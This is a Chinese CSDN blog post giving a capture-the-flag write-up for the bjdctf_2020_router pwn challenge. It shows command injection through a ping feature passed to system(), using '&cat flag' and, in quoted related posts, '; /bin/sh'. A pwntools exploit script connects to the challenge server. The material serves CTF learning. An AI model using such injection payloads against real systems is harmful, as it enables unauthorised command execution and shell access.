bjdctf_2020_router

最新推荐文章于 2024-09-01 20:54:12 发布
最新推荐文章于 2024-09-01 20:54:12 发布
阅读量618 收藏 1
点赞数
分类专栏: BUU-PWN 文章标签: pwn 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/121574825
版权

bjdctf_2020_router

使用checksec查看:
在这里插入图片描述
只开启了栈不可执行,放进IDA中查看,程序逻辑代码都在main()函数中,也是一个菜单类题目
在这里插入图片描述
选项2和4是没有用的,来看看1和3:

  • 1中用户可输入0x10大小的string,程序将这个string用system()执行了???????
  • 3 栈溢出

既然1能直接执行,那就试试直接连上去cat flag

当直接使用r.sendline("cat flag")时,可以看到程序其实时已经调用了系统命令ping
在这里插入图片描述
接下来只需要绕过ping即可,这不随便绕嘛…

r.sendline("&cat flag")
在这里插入图片描述

exp:

from pwn import *

#start 
r = remote("node4.buuoj.cn",26453)
# r = process("../buu/bjdctf_2020_router")

#params

#attack
r.recv()
r.sendline("1")
r.recv()
r.sendline("&cat flag")

r.interactive()
rust_road_router
06-28
Rust 路由框架和工具包有两个板条箱。该引擎是一个包含多种路由算法和实用程序的库,用于处理路由数据。...有关更多信息,请参阅相应 crate 的自述文件。此外,还有一个lib目录,其中包含InertialFlowCutter ,这是一个...
BUUCTF pwn——bjdctf_2020_router
CNS-Enterprise BCC-1701-J
05-09 308
BUUCTF 做题练习
bjdctf-2020-router
最新发布
m0_73743784的博客
09-01 212
其实知道 Linux 中的命令执行可以用;分隔就会非常简单。
bjdctf_2020_router 1
weixin_74861133的博客
03-10 407
逻辑很简单,一直打印菜单,但仔细看来只有1有用,别的都是迷惑的,1中的功能先是读入一个0x10大小的字符串buf,然后使用strcat函数将buf拼接在dest后面,那这个dest是什么呢,我们先随便输入一个字符串跟据后面的提示想到dest应该是ping,因为ping命令后面什么也不跟会报错。还有一种方法就是上面已经有了dest的值了。
rtl.zip_router
09-14
This is also RTL of router by using another type of method
WSN_Router.rar_JN5121_WSN_router
09-21
本文将详细探讨基于JN5121微控制器的WSN路由器的实现代码,即"WSN_Router.c",以帮助读者深入理解WSN路由器的工作原理和编程实践。 JN5121是一款由恩智浦半导体(NXP Semiconductors)推出的微控制器,专门设计用于...
luyouqi.rar_Boson_router _路由器
09-20
《路由器配置详解——基于Boson Router的虚拟实践》 在现代网络环境中,路由器作为连接不同网络的关键设备,其配置显得尤为重要。本文将详细介绍如何利用Boson Router这款软件进行路由器的虚拟配置,帮助读者深入...
Using_Linux_As_A_Router.rar_router
09-24
Using Linux As A Router
BJDCTF2020 router
qq_39980610的博客
08-23 301
BJDCTF2020 router
BUUCTF-bjdctf_2020_router-WP
Rt1Text的博客
02-12 240
64位。
[BUUCTF]PWN——bjdctf_2020_router
mcmuyanga的博客
11-06 1004
bjdctf_2020_router 附件 步骤: 例行检查,64位程序,开启了NX保护 本地试运行一下程序,看看大概的情况 会让我们选择,选择4.root,没什么用,但是注意了,这边选1会执行ping命令,尝试在ping命令后拼接ls,可以看到ls命令也执行了 这边利用了linux下的命令机制,命令1+;+命令2 这样的格式两种指令都会执行 3 . 利用这点,远程连接,尝试读出flag ...
【BUUCTF】bjdctf_2020_router
m0_51251108的博客
12-31 341
【BUUCTF】bjdctf_2020_router linux里面命令可以用;或&分隔,接下来就可以输我们要的命令了
BUUCTF pwn——bjdctf_2020_babystack
CNS-Enterprise BCC-1701-J
03-31 282
BUUCTF 做题练习
[BUUCTF-pwn]——bjdctf_2020_router
Y_peak的博客
03-16 356
[BUUCTF-pwn]——bjdctf_2020_router 关键漏洞, 如果输入 ; /bin/sh 就会执行system("/bin/sh") 分号是分割符 exploit from pwn import * p = remote("node3.buuoj.cn",27911) p.sendline('1') p.sendafter("Please input the ip address:\n", "; /bin/sh\x00") p.interactive() ...
BJDCTF2020 babyrouter
qq_39980610的博客
08-22 277
BJDCTF2020 babyrouter
深入理解Zend Framework:Zend_Controller_Router路由解析
"这篇教程详细解析了Zend Framework中的路由功能组件`Zend_Controller_Router`,涵盖了该组件的原理、使用方法以及注意事项,旨在帮助开发者更好地理解和应用这一关键特性。" 在Zend Framework中,路由功能是应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值